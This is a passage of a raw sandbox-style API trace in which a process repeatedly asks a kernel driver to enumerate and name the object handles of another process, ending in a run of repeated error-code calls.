AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001fbe080, HandleInformation=0x0) returned 0x0 [0186.902] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.902] PsReleaseProcessExitSynchronization () returned 0x2 [0186.902] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.902] ObQueryNameString (in: Object=0xfffffa8001fbe080, ObjectNameInfo=0xfffffa800313b7c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313b7c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.902] ObfDereferenceObject (Object=0xfffffa8001fbe080) returned 0x5 [0186.902] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.902] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.902] NtQueryInformationThread (in: ThreadHandle=0x0, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000008 [0186.902] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.903] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.903] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.903] PsAcquireProcessExitSynchronization () returned 0x0 [0186.903] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.903] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800214f1f0, HandleInformation=0x0) returned 0x0 [0186.903] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.903] PsReleaseProcessExitSynchronization () returned 0x2 [0186.903] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.903] ObQueryNameString (in: Object=0xfffffa800214f1f0, ObjectNameInfo=0xfffffa800315f044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315f044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.903] ObfDereferenceObject (Object=0xfffffa800214f1f0) returned 0x1 [0186.903] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.903] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.903] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.904] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.904] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.904] PsAcquireProcessExitSynchronization () returned 0x0 [0186.904] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.904] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001fb34c0, HandleInformation=0x0) returned 0x0 [0186.904] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.904] PsReleaseProcessExitSynchronization () returned 0x2 [0186.904] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.904] ObQueryNameString (in: Object=0xfffffa8001fb34c0, ObjectNameInfo=0xfffffa800317e044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317e044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.904] ObfDereferenceObject (Object=0xfffffa8001fb34c0) returned 0x1 [0186.904] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.904] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.904] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.904] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.905] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.905] PsAcquireProcessExitSynchronization () returned 0x0 [0186.905] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.905] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80021501f0, HandleInformation=0x0) returned 0x0 [0186.905] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.905] PsReleaseProcessExitSynchronization () returned 0x2 [0186.905] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.905] ObQueryNameString (in: Object=0xfffffa80021501f0, ObjectNameInfo=0xfffffa800315c7c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315c7c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.905] ObfDereferenceObject (Object=0xfffffa80021501f0) returned 0x1 [0186.905] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.905] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.905] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.906] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.906] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.906] PsAcquireProcessExitSynchronization () returned 0x0 [0186.906] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.906] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002857700, HandleInformation=0x0) returned 0x0 [0186.906] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.906] PsReleaseProcessExitSynchronization () returned 0x2 [0186.906] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.906] ObQueryNameString (in: Object=0xfffffa8002857700, ObjectNameInfo=0xfffffa8003140044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003140044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.906] ObfDereferenceObject (Object=0xfffffa8002857700) returned 0x1 [0186.906] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.907] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.907] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.907] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.907] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.907] PsAcquireProcessExitSynchronization () returned 0x0 [0186.907] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.907] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800283e650, HandleInformation=0x0) returned 0x0 [0186.907] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.907] PsReleaseProcessExitSynchronization () returned 0x2 [0186.908] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.908] ObQueryNameString (in: Object=0xfffffa800283e650, ObjectNameInfo=0xfffffa800311f2c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800311f2c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.908] ObfDereferenceObject (Object=0xfffffa800283e650) returned 0x1 [0186.908] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.908] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.908] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.908] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.908] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.908] PsAcquireProcessExitSynchronization () returned 0x0 [0186.908] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.908] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001e86770, HandleInformation=0x0) returned 0x0 [0186.909] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.909] PsReleaseProcessExitSynchronization () returned 0x2 [0186.909] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.909] ObQueryNameString (in: Object=0xfffffa8001e86770, ObjectNameInfo=0xfffffa80031393c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa80031393c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.909] ObfDereferenceObject (Object=0xfffffa8001e86770) returned 0x1 [0186.909] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.909] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.909] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.909] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0186.909] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.909] PsAcquireProcessExitSynchronization () returned 0x0 [0186.909] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.909] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0186.910] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.910] PsReleaseProcessExitSynchronization () returned 0x2 [0186.910] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.910] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa800313b7c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313b7c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.910] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x6 [0186.910] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.910] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.910] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.910] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0186.911] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.911] PsAcquireProcessExitSynchronization () returned 0x0 [0186.911] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.911] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800298b6a0, HandleInformation=0x0) returned 0x0 [0186.911] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.911] PsReleaseProcessExitSynchronization () returned 0x2 [0186.911] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.911] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315f044, Length=0x800, ReturnLength=0xfffff88002aab508 | out: ObjectNameInfo=0xfffffa800315f044, ReturnLength=0xfffff88002aab508) returned 0x0 [0186.911] ObfDereferenceObject (Object=0xfffffa800298b6a0) returned 0x3 [0186.911] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.911] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.911] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.911] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.912] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.912] PsAcquireProcessExitSynchronization () returned 0x0 [0186.912] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.912] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003434a00, HandleInformation=0x0) returned 0x0 [0186.912] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.912] PsReleaseProcessExitSynchronization () returned 0x2 [0186.912] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.912] ObQueryNameString (in: Object=0xfffffa8003434a00, ObjectNameInfo=0xfffffa800317e044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317e044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.912] ObfDereferenceObject (Object=0xfffffa8003434a00) returned 0x1 [0186.912] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.912] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.912] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.912] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.912] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.912] PsAcquireProcessExitSynchronization () returned 0x0 [0186.912] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.912] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001fbf300, HandleInformation=0x0) returned 0x0 [0186.912] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.912] PsReleaseProcessExitSynchronization () returned 0x2 [0186.912] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.912] ObQueryNameString (in: Object=0xfffffa8001fbf300, ObjectNameInfo=0xfffffa800315c7c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315c7c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.912] ObfDereferenceObject (Object=0xfffffa8001fbf300) returned 0x2 [0186.913] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.913] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.913] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.913] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.913] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.913] PsAcquireProcessExitSynchronization () returned 0x0 [0186.913] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.913] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003757130, HandleInformation=0x0) returned 0x0 [0186.913] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.913] PsReleaseProcessExitSynchronization () returned 0x2 [0186.913] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.913] ObQueryNameString (in: Object=0xfffffa8003757130, ObjectNameInfo=0xfffffa800314c044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314c044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.913] ObfDereferenceObject (Object=0xfffffa8003757130) returned 0x2 [0186.913] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.913] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.913] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.913] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x70, lpOverlapped=0x0) returned 1 [0186.913] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.913] PsAcquireProcessExitSynchronization () returned 0x0 [0186.913] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.914] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a0012f3ee0, HandleInformation=0x0) returned 0x0 [0186.914] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.914] PsReleaseProcessExitSynchronization () returned 0x2 [0186.914] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.914] ObQueryNameString (in: Object=0xfffff8a0012f3ee0, ObjectNameInfo=0xfffffa8003131044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003131044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.914] ObfDereferenceObject (Object=0xfffff8a0012f3ee0) returned 0x1 [0186.914] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.914] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.914] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.914] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0186.914] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.914] PsAcquireProcessExitSynchronization () returned 0x0 [0186.914] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.914] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002009290, HandleInformation=0x0) returned 0x0 [0186.914] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.915] PsReleaseProcessExitSynchronization () returned 0x2 [0186.915] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.915] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312b044, Length=0x800, ReturnLength=0xfffff88002aab508 | out: ObjectNameInfo=0xfffffa800312b044, ReturnLength=0xfffff88002aab508) returned 0x0 [0186.915] ObfDereferenceObject (Object=0xfffffa8002009290) returned 0x2 [0186.915] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.915] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.915] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1000) returned 0x314b40 [0186.915] GetLastError () returned 0x5 [0186.915] SetLastError (dwErrCode=0x5) [0186.915] GetLastError () returned 0x5 [0186.915] SetLastError (dwErrCode=0x5) [0186.915] GetLastError () returned 0x5 [0186.915] SetLastError (dwErrCode=0x5) [0186.915] GetLastError () returned 0x5 [0186.915] SetLastError (dwErrCode=0x5) [0186.915] GetLastError () returned 0x5 [0186.915] SetLastError (dwErrCode=0x5) [0186.915] GetLastError () returned 0x5 [0186.915] SetLastError (dwErrCode=0x5) [0186.916] GetLastError () returned 0x5 [0186.916] SetLastError (dwErrCode=0x5) [0186.916] GetLastError () returned 0x5 [0186.916] SetLastError (dwErrCode=0x5) [0186.916] GetLastError () returned 0x5 [0186.916] SetLastError (dwErrCode=0x5) [0186.916] GetLastError () returned 0x5 [0186.916] SetLastError (dwErrCode=0x5) [0186.916] GetLastError () returned 0x5 [0186.916] SetLastError (dwErrCode=0x5) [0186.916] GetLastError () returned 0x5 [0186.916] SetLastError (dwErrCode=0x5) [0186.917] GetLastError () returned 0x5 [0186.917] SetLastError (dwErrCode=0x5) [0186.917] GetLastError () returned 0x5 [0186.917] SetLastError (dwErrCode=0x5) [0186.917] GetLastError () returned 0x5 [0186.917] SetLastError (dwErrCode=0x5) [0186.917] GetLastError () returned 0x5 [0186.917] SetLastError (dwErrCode=0x5) [0186.917] GetLastError () returned 0x5 [0186.918] SetLastError (dwErrCode=0x5) [0186.918] GetLastError () returned 0x5 [0186.918] SetLastError (dwErrCode=0x5) [0186.918] GetLastError () returned 0x5 [0186.918] SetLastError (dwErrCode=0x5) [0186.918] GetLastError () returned 0x5 [0186.918] SetLastError (dwErrCode=0x5) [0186.918] GetLastError () returned 0x5 [0186.918] SetLastError (dwErrCode=0x5) [0186.919] GetLastError () returned 0x5 [0186.919] SetLastError (dwErrCode=0x5) [0186.919] GetLastError () returned 0x5 [0186.919] SetLastError (dwErrCode=0x5) [0186.919] GetLastError () returned 0x5 [0186.919] SetLastError (dwErrCode=0x5) [0186.919] GetLastError () returned 0x5 [0186.919] SetLastError (dwErrCode=0x5) [0186.920] GetLastError () returned 0x5 [0186.920] SetLastError (dwErrCode=0x5) [0186.920] GetLastError () returned 0x5 [0186.920] SetLastError (dwErrCode=0x5) [0186.920] GetLastError () returned 0x5 [0186.920] SetLastError (dwErrCode=0x5) [0186.920] GetLastError () returned 0x5 [0186.920] SetLastError (dwErrCode=0x5) [0186.921] GetLastError () returned 0x5 [0186.921] SetLastError (dwErrCode=0x5) [0186.921] GetLastError () returned 0x5 [0186.921] SetLastError (dwErrCode=0x5) [0186.921] GetLastError () returned 0x5 [0186.921] SetLastError (dwErrCode=0x5) [0186.921] GetLastError () returned 0x5 [0186.921] SetLastError (dwErrCode=0x5) [0186.922] GetLastError () returned 0x5 [0186.922] SetLastError (dwErrCode=0x5) [0186.922] GetLastError () returned 0x5 [0186.922] SetLastError (dwErrCode=0x5) [0186.922] GetLastError () returned 0x5 [0186.922] SetLastError (dwErrCode=0x5) [0186.922] GetLastError () returned 0x5 [0186.922] SetLastError (dwErrCode=0x5) [0186.923] GetLastError () returned 0x5 [0186.923] SetLastError (dwErrCode=0x5) [0186.923] GetLastError () returned 0x5 [0186.923] SetLastError (dwErrCode=0x5) [0186.923] GetLastError () returned 0x5 [0186.923] SetLastError (dwErrCode=0x5) [0186.923] 